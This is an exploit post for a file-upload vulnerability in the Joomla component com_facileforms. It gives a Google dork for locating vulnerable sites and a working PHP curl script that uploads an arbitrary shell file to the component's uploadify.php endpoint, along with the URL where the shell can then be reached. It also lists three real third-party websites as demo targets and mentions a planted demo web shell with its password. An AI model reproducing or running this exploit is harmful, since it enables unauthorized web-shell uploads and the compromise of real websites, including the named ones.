-----------------------------------------------------------------------
Joomla Component com_facileforms shell upload Vulnerability
-----------------------------------------------------------------------
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/com_facileforms/"
# Tested on : Windows 7 , Backtrack 5r3
####
#=> Exploit Info :
------------------
# The attacker can uplaod any file/shell.php .phtml .aspx .pl ......
------------------
#=> Note : u can use Uploadify jQuery Generic File Upload (Metasploit) for KedAns-Dz
#=> Exploit
-----------
<?php
$uploadfile="zik.php";
$ch = curl_init("http://[target]/[path]/components/com_facileforms/libraries/jquery/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/components/com_facileforms/libraries/jquery/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://[target]/[path]/components/com_facileforms/libraries/jquery/zik.php
<?php
phpinfo();
?>
-----------
#=> Demo's
------------
http://worldleaguefootball.com/components/com_facileforms/libraries/jquery/uploadify.php
http://gv-herrliberg.ch/components/com_facileforms/libraries/jquery/uploadify.php
http://www.orion-construction.com/english/components/com_facileforms/libraries/jquery/uploadify.php
------------
=> Demo shell => change uploadify.php with x.php => shell password : dz0
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information